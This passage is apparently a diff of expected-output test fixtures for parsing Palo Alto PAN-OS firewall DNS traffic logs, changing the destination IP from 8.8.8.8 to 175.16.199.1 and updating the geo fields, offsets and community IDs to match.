+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -5551,7 +5355,7 @@
         "event.end": "2018-11-30T16:09:13.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24093,1,38663,53,61722,53,0x400019,udp,allow,228,84,144,2,2018/11/30 16:09:13,0,any,0,32091162,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24093,1,38663,53,61722,53,0x400019,udp,allow,228,84,144,2,2018/11/30 16:09:13,0,any,0,32091162,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:09:13.000-02:00",
         "event.timezone": "-02:00",
@@ -5563,12 +5367,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 23504,
+        "log.offset": 23734,
         "network.application": "dns",
         "network.bytes": 228,
         "network.community_id": [
-            "1:jK1/samUe1w5J1uVlmH7SIXX1YE=",
-            "1:lz0ZCL4R4wwyqmvefpkiJk7yR18="
+            "1:YBygWfVh+uJolv6zNydx888KbBc=",
+            "1:v3ioLfu0OhYbpmhlhNN2kLb6irc="
         ],
         "network.direction": "outbound",
         "network.packets": 2,
@@ -5585,12 +5389,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24093",
-        "panw.panos.network.nat.community_id": "1:lz0ZCL4R4wwyqmvefpkiJk7yR18=",
+        "panw.panos.network.nat.community_id": "1:YBygWfVh+uJolv6zNydx888KbBc=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091162,
         "panw.panos.source.interface": "ethernet1/2",
@@ -5605,14 +5409,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.224",
-            "8.8.8.8"
+            "192.168.15.224"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 144,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -5637,17 +5441,18 @@
         "client.nat.port": 14247,
         "client.packets": 1,
         "client.port": 50443,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 206,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -5661,7 +5466,7 @@
         "event.end": "2018-11-30T16:09:13.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24117,1,50443,53,14247,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091163,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24117,1,50443,53,14247,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091163,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:09:13.000-02:00",
         "event.timezone": "-02:00",
@@ -5673,12 +5478,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 23953,
+        "log.offset": 24193,
         "network.application": "dns",
         "network.bytes": 337,
         "network.community_id": [
-            "1:DkOVz0BGrlh9OPZZ8+58eugW7gU=",
-            "1:pe+tF7SEY/Km9LRsrGI4UWHmV8E="
+            "1:YJceH5rZcz1VbKygrm/qccp9Ess=",
+            "1:w8XnxnTMQAhm5sOtGkm43MuGB1Y="
         ],
         "network.direction": "outbound",
         "network.packets": 2,
@@ -5695,12 +5500,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24117",
-        "panw.panos.network.nat.community_id": "1:DkOVz0BGrlh9OPZZ8+58eugW7gU=",
+        "panw.panos.network.nat.community_id": "1:YJceH5rZcz1VbKygrm/qccp9Ess=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091163,
         "panw.panos.source.interface": "ethernet1/2",
@@ -5715,14 +5520,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.224",
-            "8.8.8.8"
+            "192.168.15.224"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 206,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -5747,17 +5552,18 @@
         "client.nat.port": 33580,
         "client.packets": 1,
         "client.port": 54215,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 206,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -5771,7 +5577,7 @@
         "event.end": "2018-11-30T16:09:13.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24142,1,54215,53,33580,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091164,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24142,1,54215,53,33580,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091164,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:09:13.000-02:00",
         "event.timezone": "-02:00",
@@ -5783,12 +5589,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 24403,
+        "log.offset": 24653,
         "network.application": "dns",
         "network.bytes": 337,
         "network.community_id": [
-            "1:qHh6xeCGBZ5pLwaBsFDRVbP5MZU=",
-            "1:twx1eOqehbazvI0g0nkTeVynrY0="
+            "1:MaNPtaexrtBDiK1FqZV47sf+niI=",
+            "1:t6loEqKMys5Konp+NIaNnuyNaT8="
         ],
         "network.direction": "outbound",
         "network.packets": 2,
@@ -5805,12 +5611,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24142",
-        "panw.panos.network.nat.community_id": "1:twx1eOqehbazvI0g0nkTeVynrY0=",
+        "panw.panos.network.nat.community_id": "1:MaNPtaexrtBDiK1FqZV47sf+niI=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091164,
         "panw.panos.source.interface": "ethernet1/2",
@@ -5825,14 +5631,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.224",
-            "8.8.8.8"
+            "192.168.15.224"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 206,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -5857,17 +5663,18 @@
         "client.nat.port": 13498,
         "client.packets": 1,
         "client.port": 35827,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 169,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -5881,7 +5688,7 @@
         "event.end": "2018-11-30T16:09:13.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24195,1,35827,53,13498,53,0x400019,udp,allow,252,83,169,2,2018/11/30 16:09:13,0,any,0,32091165,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24195,1,35827,53,13498,53,0x400019,udp,allow,252,83,169,2,2018/11/30 16:09:13,0,any,0,32091165,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:09:13.000-02:00",
         "event.timezone": "-02:00",
@@ -5893,12 +5700,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 24853,
+        "log.offset": 25113,
         "network.application": "dns",
         "network.bytes": 252,
         "network.community_id": [
-            "1:7yZMN4i1Gxii2+FmEtBbvDk3lvA=",
-            "1:hcgjXpi+ne3QnFDBLeskkVg4V+M="
+            "1:IIfOFVIY3zfc25N4A7SFL5AUzm8=",
+            "1:WD+GaCUhMujDfHSy7AUahHp1vWw="
         ],
         "network.direction": "outbound",
         "network.packets": 2,
@@ -5915,12 +5722,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24195",
-        "panw.panos.network.nat.community_id": "1:hcgjXpi+ne3QnFDBLeskkVg4V+M=",
+        "panw.panos.network.nat.community_id": "1:WD+GaCUhMujDfHSy7AUahHp1vWw=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091165,
         "panw.panos.source.interface": "ethernet1/2",
@@ -5935,14 +5742,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.224",
-            "8.8.8.8"
+            "192.168.15.224"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 169,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -5967,17 +5774,18 @@
         "client.nat.port": 20365,
         "client.packets": 1,
         "client.port": 60609,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 132,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -5991,7 +5799,7 @@
         "event.end": "2018-11-30T16:09:13.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24124,1,60609,53,20365,53,0x400019,udp,allow,232,100,132,2,2018/11/30 16:09:13,0,any,0,32091166,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24124,1,60609,53,20365,53,0x400019,udp,allow,232,100,132,2,2018/11/30 16:09:13,0,any,0,32091166,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:09:13.000-02:00",
         "event.timezone": "-02:00",
@@ -6003,12 +5811,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 25302,
+        "log.offset": 25572,
         "network.application": "dns",
         "network.bytes": 232,
         "network.community_id": [
-            "1:0vV/bWp15XA8ntbAvsV9+ktbx6E=",
-            "1:C91XK45Q10iqwwp4XYM+Wg1Ua8A="
+            "1:bCQJCkKJt9w1kBS55QCraj9ey+M=",
+            "1:qPlhIGArJXmoBhQVuxsknAhz2gI="
         ],
         "network.direction": "outbound",
         "network.packets": 2,
@@ -6025,12 +5833,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24124",
-        "panw.panos.network.nat.community_id": "1:C91XK45Q10iqwwp4XYM+Wg1Ua8A=",
+        "panw.panos.network.nat.community_id": "1:bCQJCkKJt9w1kBS55QCraj9ey+M=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091166,
         "panw.panos.source.interface": "ethernet1/2",
@@ -6045,14 +5853,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.224",
-            "8.8.8.8"
+            "192.168.15.224"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 132,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -6077,17 +5885,18 @@
         "client.nat.port": 61464,
         "client.packets": 1,
         "client.port": 3248,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 127,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -6101,7 +5910,7 @@
         "event.end": "2018-11-30T16:09:13.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24153,1,3248,53,61464,53,0x400019,udp,allow,206,79,127,2,2018/11/30 16:09:13,0,any,0,32091167,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24153,1,3248,53,61464,53,0x400019,udp,allow,206,79,127,2,2018/11/30 16:09:13,0,any,0,32091167,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:09:13.000-02:00",
         "event.timezone": "-02:00",
@@ -6113,12 +5922,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 25752,
+        "log.offset": 26032,
         "network.application": "dns",
         "network.bytes": 206,
         "network.community_id": [
-            "1:hsTAFtOdeb7+Ofe152B+9h69mbE=",
-            "1:v2Rn2HMvdhM3B2CXYva9UePt+Og="
+            "1:iZ6cuDEytPuGtD80pU/7es+QhfI=",
+            "1:pCKdrcOhkESfAZbDDUbNx9zHb+E="
         ],
         "network.direction": "outbound",
         "network.packets": 2,
@@ -6135,12 +5944,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24153",
-        "panw.panos.network.nat.community_id": "1:hsTAFtOdeb7+Ofe152B+9h69mbE=",
+        "panw.panos.network.nat.community_id": "1:pCKdrcOhkESfAZbDDUbNx9zHb+E=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091167,
         "panw.panos.source.interface": "ethernet1/2",
@@ -6155,14 +5964,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.224",
-            "8.8.8.8"
+            "192.168.15.224"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 127,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -6187,17 +5996,18 @@
         "client.nat.port": 42877,
         "client.packets": 1,
         "client.port": 49284,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 105,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -6211,7 +6021,7 @@
         "event.end": "2018-11-30T16:09:13.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.196,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24122,1,49284,53,42877,53,0x400019,udp,allow,194,89,105,2,2018/11/30 16:09:13,0,any,0,32091168,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24122,1,49284,53,42877,53,0x400019,udp,allow,194,89,105,2,2018/11/30 16:09:13,0,any,0,32091168,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:09:13.000-02:00",
         "event.timezone": "-02:00",
@@ -6223,12 +6033,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 26200,
+        "log.offset": 26490,
         "network.application": "dns",
         "network.bytes": 194,
         "network.community_id": [
-            "1:htOXUg3QOGd0fpgLjYzQlvRMzUQ=",
-            "1:tO559KwdaAXfBh7HmZSLp9/JUJQ="
+            "1:/QRiz8XrvAKWvL7InyO5YWn7Unw=",
+            "1:zALUieRh+c7GcKa4k74kugaW5NQ="
         ],
         "network.direction": "outbound",
         "network.packets": 2,
@@ -6245,12 +6055,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24122",
-        "panw.panos.network.nat.community_id": "1:htOXUg3QOGd0fpgLjYzQlvRMzUQ=",
+        "panw.panos.network.nat.community_id": "1:/QRiz8XrvAKWvL7InyO5YWn7Unw=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091168,
         "panw.panos.source.interface": "ethernet1/2",
@@ -6265,14 +6075,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.196",
-            "8.8.8.8"
+            "192.168.15.196"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 105,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -6297,17 +6107,18 @@
         "client.nat.port": 5918,
         "client.packets": 1,
         "client.port": 57732,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 172,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
